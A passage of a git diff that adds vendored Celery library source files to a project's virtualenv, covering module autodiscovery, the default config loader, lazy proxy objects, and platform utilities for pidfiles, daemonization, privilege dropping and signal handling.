+ + +def autodiscover_tasks(packages, related_name='tasks'): + global _RACE_PROTECTION + + if _RACE_PROTECTION: + return () + _RACE_PROTECTION = True + try: + return [find_related_module(pkg, related_name) for pkg in packages] + finally: + _RACE_PROTECTION = False + + +def find_related_module(package, related_name): + """Find module in package.""" + # Django 1.7 allows for specifying a class name in INSTALLED_APPS. + # (Issue #2248). 
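+    # Example: find_related_module('django.contrib.auth', 'tasks') imports
+    # 'django.contrib.auth' and then returns None, since that app defines
+    # no 'tasks' submodule.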
+ try: + module = importlib.import_module(package) + if not related_name and module: + return module + except ImportError: + package, _, _ = package.rpartition('.') + if not package: + raise + + module_name = f'{package}.{related_name}' + + try: + return importlib.import_module(module_name) + except ImportError as e: + import_exc_name = getattr(e, 'name', module_name) + if import_exc_name is not None and import_exc_name != module_name: + raise e + return diff --git a/env/Lib/site-packages/celery/loaders/default.py b/env/Lib/site-packages/celery/loaders/default.py new file mode 100644 index 00000000..b49634c2 --- /dev/null +++ b/env/Lib/site-packages/celery/loaders/default.py @@ -0,0 +1,42 @@ +"""The default loader used when no custom app has been initialized.""" +import os +import warnings + +from celery.exceptions import NotConfigured +from celery.utils.collections import DictAttribute +from celery.utils.serialization import strtobool + +from .base import BaseLoader + +__all__ = ('Loader', 'DEFAULT_CONFIG_MODULE') + +DEFAULT_CONFIG_MODULE = 'celeryconfig' + +#: Warns if configuration file is missing if :envvar:`C_WNOCONF` is set. +C_WNOCONF = strtobool(os.environ.get('C_WNOCONF', False)) + + +class Loader(BaseLoader): + """The loader used by the default app.""" + + def setup_settings(self, settingsdict): + return DictAttribute(settingsdict) + + def read_configuration(self, fail_silently=True): + """Read configuration from :file:`celeryconfig.py`.""" + configname = os.environ.get('CELERY_CONFIG_MODULE', + DEFAULT_CONFIG_MODULE) + try: + usercfg = self._import_config_module(configname) + except ImportError: + if not fail_silently: + raise + # billiard sets this if forked using execv + if C_WNOCONF and not os.environ.get('FORKED_BY_MULTIPROCESSING'): + warnings.warn(NotConfigured( + 'No {module} module found! Please make sure it exists and ' + 'is available to Python.'.format(module=configname))) + return self.setup_settings({}) + else: + self.configured = True + return self.setup_settings(usercfg) diff --git a/env/Lib/site-packages/celery/local.py b/env/Lib/site-packages/celery/local.py new file mode 100644 index 00000000..7bbe6151 --- /dev/null +++ b/env/Lib/site-packages/celery/local.py @@ -0,0 +1,543 @@ +"""Proxy/PromiseProxy implementation. + +This module contains critical utilities that needs to be loaded as +soon as possible, and that shall not load any third party modules. + +Parts of this module is Copyright by Werkzeug Team. +""" + +import operator +import sys +from functools import reduce +from importlib import import_module +from types import ModuleType + +__all__ = ('Proxy', 'PromiseProxy', 'try_import', 'maybe_evaluate') + +__module__ = __name__ # used by Proxy class body + + +def _default_cls_attr(name, type_, cls_value): + # Proxy uses properties to forward the standard + # class attributes __module__, __name__ and __doc__ to the real + # object, but these needs to be a string when accessed from + # the Proxy class directly. This is a hack to make that work. + # -- See Issue #1087. + + def __new__(cls, getter): + instance = type_.__new__(cls, cls_value) + instance.__getter = getter + return instance + + def __get__(self, obj, cls=None): + return self.__getter(obj) if obj is not None else self + + return type(name, (type_,), { + '__new__': __new__, '__get__': __get__, + }) + + +def try_import(module, default=None): + """Try to import and return module. + + Returns None if the module does not exist. 
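+
+    Example::
+
+        >>> resource = try_import('resource')  # None on Windows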
+ """ + try: + return import_module(module) + except ImportError: + return default + + +class Proxy: + """Proxy to another object.""" + + # Code stolen from werkzeug.local.Proxy. + __slots__ = ('__local', '__args', '__kwargs', '__dict__') + + def __init__(self, local, + args=None, kwargs=None, name=None, __doc__=None): + object.__setattr__(self, '_Proxy__local', local) + object.__setattr__(self, '_Proxy__args', args or ()) + object.__setattr__(self, '_Proxy__kwargs', kwargs or {}) + if name is not None: + object.__setattr__(self, '__custom_name__', name) + if __doc__ is not None: + object.__setattr__(self, '__doc__', __doc__) + + @_default_cls_attr('name', str, __name__) + def __name__(self): + try: + return self.__custom_name__ + except AttributeError: + return self._get_current_object().__name__ + + @_default_cls_attr('qualname', str, __name__) + def __qualname__(self): + try: + return self.__custom_name__ + except AttributeError: + return self._get_current_object().__qualname__ + + @_default_cls_attr('module', str, __module__) + def __module__(self): + return self._get_current_object().__module__ + + @_default_cls_attr('doc', str, __doc__) + def __doc__(self): + return self._get_current_object().__doc__ + + def _get_class(self): + return self._get_current_object().__class__ + + @property + def __class__(self): + return self._get_class() + + def _get_current_object(self): + """Get current object. + + This is useful if you want the real + object behind the proxy at a time for performance reasons or because + you want to pass the object into a different context. + """ + loc = object.__getattribute__(self, '_Proxy__local') + if not hasattr(loc, '__release_local__'): + return loc(*self.__args, **self.__kwargs) + try: # pragma: no cover + # not sure what this is about + return getattr(loc, self.__name__) + except AttributeError: # pragma: no cover + raise RuntimeError(f'no object bound to {self.__name__}') + + @property + def __dict__(self): + try: + return self._get_current_object().__dict__ + except RuntimeError: # pragma: no cover + raise AttributeError('__dict__') + + def __repr__(self): + try: + obj = self._get_current_object() + except RuntimeError: # pragma: no cover + return f'<{self.__class__.__name__} unbound>' + return repr(obj) + + def __bool__(self): + try: + return bool(self._get_current_object()) + except RuntimeError: # pragma: no cover + return False + + __nonzero__ = __bool__ # Py2 + + def __dir__(self): + try: + return dir(self._get_current_object()) + except RuntimeError: # pragma: no cover + return [] + + def __getattr__(self, name): + if name == '__members__': + return dir(self._get_current_object()) + return getattr(self._get_current_object(), name) + + def __setitem__(self, key, value): + self._get_current_object()[key] = value + + def __delitem__(self, key): + del self._get_current_object()[key] + + def __setattr__(self, name, value): + setattr(self._get_current_object(), name, value) + + def __delattr__(self, name): + delattr(self._get_current_object(), name) + + def __str__(self): + return str(self._get_current_object()) + + def __lt__(self, other): + return self._get_current_object() < other + + def __le__(self, other): + return self._get_current_object() <= other + + def __eq__(self, other): + return self._get_current_object() == other + + def __ne__(self, other): + return self._get_current_object() != other + + def __gt__(self, other): + return self._get_current_object() > other + + def __ge__(self, other): + return self._get_current_object() >= other + + def 
__hash__(self): + return hash(self._get_current_object()) + + def __call__(self, *a, **kw): + return self._get_current_object()(*a, **kw) + + def __len__(self): + return len(self._get_current_object()) + + def __getitem__(self, i): + return self._get_current_object()[i] + + def __iter__(self): + return iter(self._get_current_object()) + + def __contains__(self, i): + return i in self._get_current_object() + + def __add__(self, other): + return self._get_current_object() + other + + def __sub__(self, other): + return self._get_current_object() - other + + def __mul__(self, other): + return self._get_current_object() * other + + def __floordiv__(self, other): + return self._get_current_object() // other + + def __mod__(self, other): + return self._get_current_object() % other + + def __divmod__(self, other): + return self._get_current_object().__divmod__(other) + + def __pow__(self, other): + return self._get_current_object() ** other + + def __lshift__(self, other): + return self._get_current_object() << other + + def __rshift__(self, other): + return self._get_current_object() >> other + + def __and__(self, other): + return self._get_current_object() & other + + def __xor__(self, other): + return self._get_current_object() ^ other + + def __or__(self, other): + return self._get_current_object() | other + + def __div__(self, other): + return self._get_current_object().__div__(other) + + def __truediv__(self, other): + return self._get_current_object().__truediv__(other) + + def __neg__(self): + return -(self._get_current_object()) + + def __pos__(self): + return +(self._get_current_object()) + + def __abs__(self): + return abs(self._get_current_object()) + + def __invert__(self): + return ~(self._get_current_object()) + + def __complex__(self): + return complex(self._get_current_object()) + + def __int__(self): + return int(self._get_current_object()) + + def __float__(self): + return float(self._get_current_object()) + + def __oct__(self): + return oct(self._get_current_object()) + + def __hex__(self): + return hex(self._get_current_object()) + + def __index__(self): + return self._get_current_object().__index__() + + def __coerce__(self, other): + return self._get_current_object().__coerce__(other) + + def __enter__(self): + return self._get_current_object().__enter__() + + def __exit__(self, *a, **kw): + return self._get_current_object().__exit__(*a, **kw) + + def __reduce__(self): + return self._get_current_object().__reduce__() + + +class PromiseProxy(Proxy): + """Proxy that evaluates object once. + + :class:`Proxy` will evaluate the object each time, while the + promise will only evaluate it once. 
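+
+    Example (a minimal sketch; the factory function is a placeholder)::
+
+        >>> config = PromiseProxy(lambda: load_expensive_config())
+        >>> config.debug   # evaluated and cached on first attribute access
+        >>> config.debug   # subsequent access reuses the evaluated object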
+ """ + + __slots__ = ('__pending__', '__weakref__') + + def _get_current_object(self): + try: + return object.__getattribute__(self, '__thing') + except AttributeError: + return self.__evaluate__() + + def __then__(self, fun, *args, **kwargs): + if self.__evaluated__(): + return fun(*args, **kwargs) + from collections import deque + try: + pending = object.__getattribute__(self, '__pending__') + except AttributeError: + pending = None + if pending is None: + pending = deque() + object.__setattr__(self, '__pending__', pending) + pending.append((fun, args, kwargs)) + + def __evaluated__(self): + try: + object.__getattribute__(self, '__thing') + except AttributeError: + return False + return True + + def __maybe_evaluate__(self): + return self._get_current_object() + + def __evaluate__(self, + _clean=('_Proxy__local', + '_Proxy__args', + '_Proxy__kwargs')): + try: + thing = Proxy._get_current_object(self) + except Exception: + raise + else: + object.__setattr__(self, '__thing', thing) + for attr in _clean: + try: + object.__delattr__(self, attr) + except AttributeError: # pragma: no cover + # May mask errors so ignore + pass + try: + pending = object.__getattribute__(self, '__pending__') + except AttributeError: + pass + else: + try: + while pending: + fun, args, kwargs = pending.popleft() + fun(*args, **kwargs) + finally: + try: + object.__delattr__(self, '__pending__') + except AttributeError: # pragma: no cover + pass + return thing + + +def maybe_evaluate(obj): + """Attempt to evaluate promise, even if obj is not a promise.""" + try: + return obj.__maybe_evaluate__() + except AttributeError: + return obj + + +# ############# Module Generation ########################## + +# Utilities to dynamically +# recreate modules, either for lazy loading or +# to create old modules at runtime instead of +# having them litter the source tree. + +# import fails in python 2.5. fallback to reduce in stdlib + + +MODULE_DEPRECATED = """ +The module %s is deprecated and will be removed in a future version. +""" + +DEFAULT_ATTRS = {'__file__', '__path__', '__doc__', '__all__'} + + +# im_func is no longer available in Py3. +# instead the unbound method itself can be used. +def fun_of_method(method): + return method + + +def getappattr(path): + """Get attribute from current_app recursively. + + Example: ``getappattr('amqp.get_task_consumer')``. + + """ + from celery import current_app + return current_app._rgetattr(path) + + +COMPAT_MODULES = { + 'celery': { + 'execute': { + 'send_task': 'send_task', + }, + 'log': { + 'get_default_logger': 'log.get_default_logger', + 'setup_logger': 'log.setup_logger', + 'setup_logging_subsystem': 'log.setup_logging_subsystem', + 'redirect_stdouts_to_logger': 'log.redirect_stdouts_to_logger', + }, + 'messaging': { + 'TaskConsumer': 'amqp.TaskConsumer', + 'establish_connection': 'connection', + 'get_consumer_set': 'amqp.TaskConsumer', + }, + 'registry': { + 'tasks': 'tasks', + }, + }, +} + +#: We exclude these from dir(celery) +DEPRECATED_ATTRS = set(COMPAT_MODULES['celery'].keys()) | {'subtask'} + + +class class_property: + + def __init__(self, getter=None, setter=None): + if getter is not None and not isinstance(getter, classmethod): + getter = classmethod(getter) + if setter is not None and not isinstance(setter, classmethod): + setter = classmethod(setter) + self.__get = getter + self.__set = setter + + info = getter.__get__(object) # just need the info attrs. 
+ self.__doc__ = info.__doc__ + self.__name__ = info.__name__ + self.__module__ = info.__module__ + + def __get__(self, obj, type=None): + if obj and type is None: + type = obj.__class__ + return self.__get.__get__(obj, type)() + + def __set__(self, obj, value): + if obj is None: + return self + return self.__set.__get__(obj)(value) + + def setter(self, setter): + return self.__class__(self.__get, setter) + + +def reclassmethod(method): + return classmethod(fun_of_method(method)) + + +class LazyModule(ModuleType): + _compat_modules = () + _all_by_module = {} + _direct = {} + _object_origins = {} + + def __getattr__(self, name): + if name in self._object_origins: + module = __import__(self._object_origins[name], None, None, + [name]) + for item in self._all_by_module[module.__name__]: + setattr(self, item, getattr(module, item)) + return getattr(module, name) + elif name in self._direct: # pragma: no cover + module = __import__(self._direct[name], None, None, [name]) + setattr(self, name, module) + return module + return ModuleType.__getattribute__(self, name) + + def __dir__(self): + return [ + attr for attr in set(self.__all__) | DEFAULT_ATTRS + if attr not in DEPRECATED_ATTRS + ] + + def __reduce__(self): + return import_module, (self.__name__,) + + +def create_module(name, attrs, cls_attrs=None, pkg=None, + base=LazyModule, prepare_attr=None): + fqdn = '.'.join([pkg.__name__, name]) if pkg else name + cls_attrs = {} if cls_attrs is None else cls_attrs + pkg, _, modname = name.rpartition('.') + cls_attrs['__module__'] = pkg + + attrs = { + attr_name: (prepare_attr(attr) if prepare_attr else attr) + for attr_name, attr in attrs.items() + } + module = sys.modules[fqdn] = type( + modname, (base,), cls_attrs)(name) + module.__dict__.update(attrs) + return module + + +def recreate_module(name, compat_modules=None, by_module=None, direct=None, + base=LazyModule, **attrs): + compat_modules = compat_modules or COMPAT_MODULES.get(name, ()) + by_module = by_module or {} + direct = direct or {} + old_module = sys.modules[name] + origins = get_origins(by_module) + + _all = tuple(set(reduce( + operator.add, + [tuple(v) for v in [compat_modules, origins, direct, attrs]], + ))) + cattrs = { + '_compat_modules': compat_modules, + '_all_by_module': by_module, '_direct': direct, + '_object_origins': origins, + '__all__': _all, + } + new_module = create_module(name, attrs, cls_attrs=cattrs, base=base) + new_module.__dict__.update({ + mod: get_compat_module(new_module, mod) for mod in compat_modules + }) + new_module.__spec__ = old_module.__spec__ + return old_module, new_module + + +def get_compat_module(pkg, name): + def prepare(attr): + if isinstance(attr, str): + return Proxy(getappattr, (attr,)) + return attr + + attrs = COMPAT_MODULES[pkg.__name__][name] + if isinstance(attrs, str): + fqdn = '.'.join([pkg.__name__, name]) + module = sys.modules[fqdn] = import_module(attrs) + return module + attrs['__all__'] = list(attrs) + return create_module(name, dict(attrs), pkg=pkg, prepare_attr=prepare) + + +def get_origins(defs): + origins = {} + for module, attrs in defs.items(): + origins.update({attr: module for attr in attrs}) + return origins diff --git a/env/Lib/site-packages/celery/platforms.py b/env/Lib/site-packages/celery/platforms.py new file mode 100644 index 00000000..f424ac37 --- /dev/null +++ b/env/Lib/site-packages/celery/platforms.py @@ -0,0 +1,831 @@ +"""Platforms. + +Utilities dealing with platform specifics: signals, daemonization, +users, groups, and so on. 
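+
+Example (editor's illustrative sketch; the paths and the ``run`` callable are
+assumptions, not part of this module):
+
+.. code-block:: pycon
+
+    >>> from celery.platforms import detached, create_pidlock
+    >>> with detached(logfile='/var/log/app.log',
+    ...               pidfile='/var/run/app.pid', uid='nobody'):
+    ...     pidlock = create_pidlock('/var/run/app.pid')
+    ...     run()  # hypothetical long-running entry point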
+""" + +import atexit +import errno +import math +import numbers +import os +import platform as _platform +import signal as _signal +import sys +import warnings +from contextlib import contextmanager + +from billiard.compat import close_open_fds, get_fdmax +from billiard.util import set_pdeathsig as _set_pdeathsig +# fileno used to be in this module +from kombu.utils.compat import maybe_fileno +from kombu.utils.encoding import safe_str + +from .exceptions import SecurityError, SecurityWarning, reraise +from .local import try_import + +try: + from billiard.process import current_process +except ImportError: + current_process = None + +_setproctitle = try_import('setproctitle') +resource = try_import('resource') +pwd = try_import('pwd') +grp = try_import('grp') +mputil = try_import('multiprocessing.util') + +__all__ = ( + 'EX_OK', 'EX_FAILURE', 'EX_UNAVAILABLE', 'EX_USAGE', 'SYSTEM', + 'IS_macOS', 'IS_WINDOWS', 'SIGMAP', 'pyimplementation', 'LockFailed', + 'get_fdmax', 'Pidfile', 'create_pidlock', 'close_open_fds', + 'DaemonContext', 'detached', 'parse_uid', 'parse_gid', 'setgroups', + 'initgroups', 'setgid', 'setuid', 'maybe_drop_privileges', 'signals', + 'signal_name', 'set_process_title', 'set_mp_process_title', + 'get_errno_name', 'ignore_errno', 'fd_by_path', +) + +# exitcodes +EX_OK = getattr(os, 'EX_OK', 0) +EX_FAILURE = 1 +EX_UNAVAILABLE = getattr(os, 'EX_UNAVAILABLE', 69) +EX_USAGE = getattr(os, 'EX_USAGE', 64) +EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73) + +SYSTEM = _platform.system() +IS_macOS = SYSTEM == 'Darwin' +IS_WINDOWS = SYSTEM == 'Windows' + +DAEMON_WORKDIR = '/' + +PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY +PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | (os.R_OK) + +PIDLOCKED = """ERROR: Pidfile ({0}) already exists. +Seems we're already running? (pid: {1})""" + +ROOT_DISALLOWED = """\ +Running a worker with superuser privileges when the +worker accepts messages serialized with pickle is a very bad idea! + +If you really want to continue then you have to set the C_FORCE_ROOT +environment variable (but please think about this before you do). + +User information: uid={uid} euid={euid} gid={gid} egid={egid} +""" + +ROOT_DISCOURAGED = """\ +You're running the worker with superuser privileges: this is +absolutely not recommended! + +Please specify a different user using the --uid option. + +User information: uid={uid} euid={euid} gid={gid} egid={egid} +""" + +ASSUMING_ROOT = """\ +An entry for the specified gid or egid was not found. +We're assuming this is a potential security issue. +""" + +SIGNAMES = { + sig for sig in dir(_signal) + if sig.startswith('SIG') and '_' not in sig +} +SIGMAP = {getattr(_signal, name): name for name in SIGNAMES} + + +def pyimplementation(): + """Return string identifying the current Python implementation.""" + if hasattr(_platform, 'python_implementation'): + return _platform.python_implementation() + elif sys.platform.startswith('java'): + return 'Jython ' + sys.platform + elif hasattr(sys, 'pypy_version_info'): + v = '.'.join(str(p) for p in sys.pypy_version_info[:3]) + if sys.pypy_version_info[3:]: + v += '-' + ''.join(str(p) for p in sys.pypy_version_info[3:]) + return 'PyPy ' + v + else: + return 'CPython' + + +class LockFailed(Exception): + """Raised if a PID lock can't be acquired.""" + + +class Pidfile: + """Pidfile. + + This is the type returned by :func:`create_pidlock`. 
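+
+    Example (editor's illustrative sketch; the path is an assumption, and
+    real code should prefer :func:`create_pidlock`):
+
+    .. code-block:: pycon
+
+        >>> pidlock = Pidfile('/var/run/app.pid').acquire()
+        >>> pidlock.read_pid() == os.getpid()
+        True
+        >>> pidlock.release()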
+ + See Also: + Best practice is to not use this directly but rather use + the :func:`create_pidlock` function instead: + more convenient and also removes stale pidfiles (when + the process holding the lock is no longer running). + """ + + #: Path to the pid lock file. + path = None + + def __init__(self, path): + self.path = os.path.abspath(path) + + def acquire(self): + """Acquire lock.""" + try: + self.write_pid() + except OSError as exc: + reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2]) + return self + + __enter__ = acquire + + def is_locked(self): + """Return true if the pid lock exists.""" + return os.path.exists(self.path) + + def release(self, *args): + """Release lock.""" + self.remove() + + __exit__ = release + + def read_pid(self): + """Read and return the current pid.""" + with ignore_errno('ENOENT'): + with open(self.path) as fh: + line = fh.readline() + if line.strip() == line: # must contain '\n' + raise ValueError( + f'Partial or invalid pidfile {self.path}') + + try: + return int(line.strip()) + except ValueError: + raise ValueError( + f'pidfile {self.path} contents invalid.') + + def remove(self): + """Remove the lock.""" + with ignore_errno(errno.ENOENT, errno.EACCES): + os.unlink(self.path) + + def remove_if_stale(self): + """Remove the lock if the process isn't running. + + I.e. process does not respond to signal. + """ + try: + pid = self.read_pid() + except ValueError: + print('Broken pidfile found - Removing it.', file=sys.stderr) + self.remove() + return True + if not pid: + self.remove() + return True + + try: + os.kill(pid, 0) + except os.error as exc: + if exc.errno == errno.ESRCH or exc.errno == errno.EPERM: + print('Stale pidfile exists - Removing it.', file=sys.stderr) + self.remove() + return True + except SystemError: + print('Stale pidfile exists - Removing it.', file=sys.stderr) + self.remove() + return True + return False + + def write_pid(self): + pid = os.getpid() + content = f'{pid}\n' + + pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE) + pidfile = os.fdopen(pidfile_fd, 'w') + try: + pidfile.write(content) + # flush and sync so that the re-read below works. + pidfile.flush() + try: + os.fsync(pidfile_fd) + except AttributeError: # pragma: no cover + pass + finally: + pidfile.close() + + rfh = open(self.path) + try: + if rfh.read() != content: + raise LockFailed( + "Inconsistency: Pidfile content doesn't match at re-read") + finally: + rfh.close() + + +PIDFile = Pidfile # XXX compat alias + + +def create_pidlock(pidfile): + """Create and verify pidfile. + + If the pidfile already exists the program exits with an error message, + however if the process it refers to isn't running anymore, the pidfile + is deleted and the program continues. + + This function will automatically install an :mod:`atexit` handler + to release the lock at exit, you can skip this by calling + :func:`_create_pidlock` instead. + + Returns: + Pidfile: used to manage the lock. + + Example: + >>> pidlock = create_pidlock('/var/run/app.pid') + """ + pidlock = _create_pidlock(pidfile) + atexit.register(pidlock.release) + return pidlock + + +def _create_pidlock(pidfile): + pidlock = Pidfile(pidfile) + if pidlock.is_locked() and not pidlock.remove_if_stale(): + print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr) + raise SystemExit(EX_CANTCREAT) + pidlock.acquire() + return pidlock + + +def fd_by_path(paths): + """Return a list of file descriptors. 
+ + This method returns list of file descriptors corresponding to + file paths passed in paths variable. + + Arguments: + paths: List[str]: List of file paths. + + Returns: + List[int]: List of file descriptors. + + Example: + >>> keep = fd_by_path(['/dev/urandom', '/my/precious/']) + """ + stats = set() + for path in paths: + try: + fd = os.open(path, os.O_RDONLY) + except OSError: + continue + try: + stats.add(os.fstat(fd)[1:3]) + finally: + os.close(fd) + + def fd_in_stats(fd): + try: + return os.fstat(fd)[1:3] in stats + except OSError: + return False + + return [_fd for _fd in range(get_fdmax(2048)) if fd_in_stats(_fd)] + + +class DaemonContext: + """Context manager daemonizing the process.""" + + _is_open = False + + def __init__(self, pidfile=None, workdir=None, umask=None, + fake=False, after_chdir=None, after_forkers=True, + **kwargs): + if isinstance(umask, str): + # octal or decimal, depending on initial zero. + umask = int(umask, 8 if umask.startswith('0') else 10) + self.workdir = workdir or DAEMON_WORKDIR + self.umask = umask + self.fake = fake + self.after_chdir = after_chdir + self.after_forkers = after_forkers + self.stdfds = (sys.stdin, sys.stdout, sys.stderr) + + def redirect_to_null(self, fd): + if fd is not None: + dest = os.open(os.devnull, os.O_RDWR) + os.dup2(dest, fd) + + def open(self): + if not self._is_open: + if not self.fake: + self._detach() + + os.chdir(self.workdir) + if self.umask is not None: + os.umask(self.umask) + + if self.after_chdir: + self.after_chdir() + + if not self.fake: + # We need to keep /dev/urandom from closing because + # shelve needs it, and Beat needs shelve to start. + keep = list(self.stdfds) + fd_by_path(['/dev/urandom']) + close_open_fds(keep) + for fd in self.stdfds: + self.redirect_to_null(maybe_fileno(fd)) + if self.after_forkers and mputil is not None: + mputil._run_after_forkers() + + self._is_open = True + + __enter__ = open + + def close(self, *args): + if self._is_open: + self._is_open = False + + __exit__ = close + + def _detach(self): + if os.fork() == 0: # first child + os.setsid() # create new session + if os.fork() > 0: # pragma: no cover + # second child + os._exit(0) + else: + os._exit(0) + return self + + +def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0, + workdir=None, fake=False, **opts): + """Detach the current process in the background (daemonize). + + Arguments: + logfile (str): Optional log file. + The ability to write to this file + will be verified before the process is detached. + pidfile (str): Optional pid file. + The pidfile won't be created, + as this is the responsibility of the child. But the process will + exit if the pid lock exists and the pid written is still running. + uid (int, str): Optional user id or user name to change + effective privileges to. + gid (int, str): Optional group id or group name to change + effective privileges to. + umask (str, int): Optional umask that'll be effective in + the child process. + workdir (str): Optional new working directory. + fake (bool): Don't actually detach, intended for debugging purposes. + **opts (Any): Ignored. + + Example: + >>> from celery.platforms import detached, create_pidlock + >>> with detached( + ... logfile='/var/log/app.log', + ... pidfile='/var/run/app.pid', + ... uid='nobody'): + ... # Now in detached child process with effective user set to nobody, + ... # and we know that our logfile can be written to, and that + ... # the pidfile isn't locked. + ... pidlock = create_pidlock('/var/run/app.pid') + ... + ... 
# Run the program + ... program.run(logfile='/var/log/app.log') + """ + if not resource: + raise RuntimeError('This platform does not support detach.') + workdir = os.getcwd() if workdir is None else workdir + + signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler. + maybe_drop_privileges(uid=uid, gid=gid) + + def after_chdir_do(): + # Since without stderr any errors will be silently suppressed, + # we need to know that we have access to the logfile. + logfile and open(logfile, 'a').close() + # Doesn't actually create the pidfile, but makes sure it's not stale. + if pidfile: + _create_pidlock(pidfile).release() + + return DaemonContext( + umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do, + ) + + +def parse_uid(uid): + """Parse user id. + + Arguments: + uid (str, int): Actual uid, or the username of a user. + Returns: + int: The actual uid. + """ + try: + return int(uid) + except ValueError: + try: + return pwd.getpwnam(uid).pw_uid + except (AttributeError, KeyError): + raise KeyError(f'User does not exist: {uid}') + + +def parse_gid(gid): + """Parse group id. + + Arguments: + gid (str, int): Actual gid, or the name of a group. + Returns: + int: The actual gid of the group. + """ + try: + return int(gid) + except ValueError: + try: + return grp.getgrnam(gid).gr_gid + except (AttributeError, KeyError): + raise KeyError(f'Group does not exist: {gid}') + + +def _setgroups_hack(groups): + # :fun:`setgroups` may have a platform-dependent limit, + # and it's not always possible to know in advance what this limit + # is, so we use this ugly hack stolen from glibc. + groups = groups[:] + + while 1: + try: + return os.setgroups(groups) + except ValueError: # error from Python's check. + if len(groups) <= 1: + raise + groups[:] = groups[:-1] + except OSError as exc: # error from the OS. + if exc.errno != errno.EINVAL or len(groups) <= 1: + raise + groups[:] = groups[:-1] + + +def setgroups(groups): + """Set active groups from a list of group ids.""" + max_groups = None + try: + max_groups = os.sysconf('SC_NGROUPS_MAX') + except Exception: # pylint: disable=broad-except + pass + try: + return _setgroups_hack(groups[:max_groups]) + except OSError as exc: + if exc.errno != errno.EPERM: + raise + if any(group not in groups for group in os.getgroups()): + # we shouldn't be allowed to change to this group. + raise + + +def initgroups(uid, gid): + """Init process group permissions. + + Compat version of :func:`os.initgroups` that was first + added to Python 2.7. + """ + if not pwd: # pragma: no cover + return + username = pwd.getpwuid(uid)[0] + if hasattr(os, 'initgroups'): # Python 2.7+ + return os.initgroups(username, gid) + groups = [gr.gr_gid for gr in grp.getgrall() + if username in gr.gr_mem] + setgroups(groups) + + +def setgid(gid): + """Version of :func:`os.setgid` supporting group names.""" + os.setgid(parse_gid(gid)) + + +def setuid(uid): + """Version of :func:`os.setuid` supporting usernames.""" + os.setuid(parse_uid(uid)) + + +def maybe_drop_privileges(uid=None, gid=None): + """Change process privileges to new user/group. + + If UID and GID is specified, the real user/group is changed. + + If only UID is specified, the real user is changed, and the group is + changed to the users primary group. + + If only GID is specified, only the group is changed. + """ + if sys.platform == 'win32': + return + if os.geteuid(): + # no point trying to setuid unless we're root. 
+ if not os.getuid(): + raise SecurityError('contact support') + uid = uid and parse_uid(uid) + gid = gid and parse_gid(gid) + + if uid: + _setuid(uid, gid) + else: + gid and setgid(gid) + + if uid and not os.getuid() and not os.geteuid(): + raise SecurityError('Still root uid after drop privileges!') + if gid and not os.getgid() and not os.getegid(): + raise SecurityError('Still root gid after drop privileges!') + + +def _setuid(uid, gid): + # If GID isn't defined, get the primary GID of the user. + if not gid and pwd: + gid = pwd.getpwuid(uid).pw_gid + # Must set the GID before initgroups(), as setgid() + # is known to zap the group list on some platforms. + + # setgid must happen before setuid (otherwise the setgid operation + # may fail because of insufficient privileges and possibly stay + # in a privileged group). + setgid(gid) + initgroups(uid, gid) + + # at last: + setuid(uid) + # ... and make sure privileges cannot be restored: + try: + setuid(0) + except OSError as exc: + if exc.errno != errno.EPERM: + raise + # we should get here: cannot restore privileges, + # everything was fine. + else: + raise SecurityError( + 'non-root user able to restore privileges after setuid.') + + +if hasattr(_signal, 'setitimer'): + def _arm_alarm(seconds): + _signal.setitimer(_signal.ITIMER_REAL, seconds) +else: + def _arm_alarm(seconds): + _signal.alarm(math.ceil(seconds)) + + +class Signals: + """Convenience interface to :mod:`signals`. + + If the requested signal isn't supported on the current platform, + the operation will be ignored. + + Example: + >>> from celery.platforms import signals + + >>> from proj.handlers import my_handler + >>> signals['INT'] = my_handler + + >>> signals['INT'] + my_handler + + >>> signals.supported('INT') + True + + >>> signals.signum('INT') + 2 + + >>> signals.ignore('USR1') + >>> signals['USR1'] == signals.ignored + True + + >>> signals.reset('USR1') + >>> signals['USR1'] == signals.default + True + + >>> from proj.handlers import exit_handler, hup_handler + >>> signals.update(INT=exit_handler, + ... TERM=exit_handler, + ... HUP=hup_handler) + """ + + ignored = _signal.SIG_IGN + default = _signal.SIG_DFL + + def arm_alarm(self, seconds): + return _arm_alarm(seconds) + + def reset_alarm(self): + return _signal.alarm(0) + + def supported(self, name): + """Return true value if signal by ``name`` exists on this platform.""" + try: + self.signum(name) + except AttributeError: + return False + else: + return True + + def signum(self, name): + """Get signal number by name.""" + if isinstance(name, numbers.Integral): + return name + if not isinstance(name, str) \ + or not name.isupper(): + raise TypeError('signal name must be uppercase string.') + if not name.startswith('SIG'): + name = 'SIG' + name + return getattr(_signal, name) + + def reset(self, *signal_names): + """Reset signals to the default signal handler. + + Does nothing if the platform has no support for signals, + or the specified signal in particular. + """ + self.update((sig, self.default) for sig in signal_names) + + def ignore(self, *names): + """Ignore signal using :const:`SIG_IGN`. + + Does nothing if the platform has no support for signals, + or the specified signal in particular. + """ + self.update((sig, self.ignored) for sig in names) + + def __getitem__(self, name): + return _signal.getsignal(self.signum(name)) + + def __setitem__(self, name, handler): + """Install signal handler. + + Does nothing if the current platform has no support for signals, + or the specified signal in particular. 
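+
+        Example (editor's illustrative sketch; ``handler`` is an assumed
+        callable with the usual ``(signum, frame)`` signature):
+
+        .. code-block:: pycon
+
+            >>> from celery.platforms import signals
+            >>> def handler(signum, frame):
+            ...     print('caught signal', signum)
+            >>> signals['TERM'] = handler        # installed where supported
+            >>> signals['NOTASIGNAL'] = handler  # unknown name: silently ignored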
